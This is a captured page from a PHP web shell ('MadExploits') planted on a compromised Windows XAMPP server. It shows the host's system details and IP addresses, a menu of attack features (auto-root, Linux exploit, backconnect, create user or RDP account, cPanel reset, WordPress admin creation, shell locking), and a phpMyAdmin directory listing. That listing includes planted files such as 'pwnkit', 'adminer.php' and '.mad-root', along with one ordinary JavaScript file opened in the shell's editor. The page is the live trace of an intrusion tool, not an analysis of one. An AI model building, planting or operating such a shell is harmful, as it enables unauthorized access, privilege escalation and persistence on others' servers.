Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.9
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
js /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
codemirror
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
designer
[ DIR ]
drwxrwxrwx
jqplot
[ DIR ]
drwxrwxrwx
server
[ DIR ]
drwxrwxrwx
setup
[ DIR ]
drwxrwxrwx
table
[ DIR ]
drwxrwxrwx
transformations
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
ajax.js
29.25
KB
-rw-rw-rw-
chart.js
16.66
KB
-rw-rw-rw-
common.js
4.42
KB
-rw-rw-rw-
config.js
23.5
KB
-rw-rw-rw-
console.js
48.39
KB
-rw-rw-rw-
cross_framing_protection.js
405
B
-rw-rw-rw-
doclinks.js
17.85
KB
-rw-rw-rw-
drag_drop_import.js
12.14
KB
-rw-rw-rw-
error_report.js
9.05
KB
-rw-rw-rw-
export.js
30.6
KB
-rw-rw-rw-
export_output.js
364
B
-rw-rw-rw-
functions.js
144.6
KB
-rw-rw-rw-
gis_data_editor.js
13.26
KB
-rw-rw-rw-
home.js
5.15
KB
-rw-rw-rw-
import.js
5.5
KB
-rw-rw-rw-
indexes.js
26.33
KB
-rw-rw-rw-
jquery.sortable-table.js
9.27
KB
-rw-rw-rw-
keyhandler.js
2.01
KB
-rw-rw-rw-
makegrid.js
79.11
KB
-rw-rw-rw-
menu_resizer.js
5.59
KB
-rw-rw-rw-
multi_column_sort.js
1.25
KB
-rw-rw-rw-
name-conflict-fixes.js
43
B
-rw-rw-rw-
navigation.js
50.62
KB
-rw-rw-rw-
normalization.js
23.54
KB
-rw-rw-rw-
ol.js
1.41
KB
-rw-rw-rw-
page_settings.js
1.78
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
replication.js
3.46
KB
-rw-rw-rw-
shortcuts_handler.js
3.23
KB
-rw-rw-rw-
sql.js
34.71
KB
-rw-rw-rw-
u2f.js
2.87
KB
-rw-rw-rw-
webauthn.js
3.86
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ol.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _control = require("ol/control.js"); var _coordinate = require("ol/coordinate.js"); var _extent = require("ol/extent.js"); var _geom = require("ol/geom.js"); var _layer = require("ol/layer.js"); var _proj = require("ol/proj.js"); var _source = require("ol/source.js"); var _style = require("ol/style.js"); var _ol = require("ol"); const ol = { control: { Attribution: _control.Attribution, MousePosition: _control.MousePosition, Zoom: _control.Zoom }, coordinate: { createStringXY: _coordinate.createStringXY }, extent: { boundingExtent: _extent.boundingExtent }, geom: { LineString: _geom.LineString, LinearRing: _geom.LinearRing, MultiLineString: _geom.MultiLineString, MultiPoint: _geom.MultiPoint, MultiPolygon: _geom.MultiPolygon, Point: _geom.Point, Polygon: _geom.Polygon }, layer: { Tile: _layer.Tile, Vector: _layer.Vector }, proj: { fromLonLat: _proj.fromLonLat, get: _proj.get, transformExtent: _proj.transformExtent }, source: { OSM: _source.OSM, Vector: _source.Vector }, style: { Circle: _style.Circle, Fill: _style.Fill, Stroke: _style.Stroke, Style: _style.Style, Text: _style.Text }, Feature: _ol.Feature, Map: _ol.Map, View: _ol.View }; var _default = ol; exports.default = _default;
Close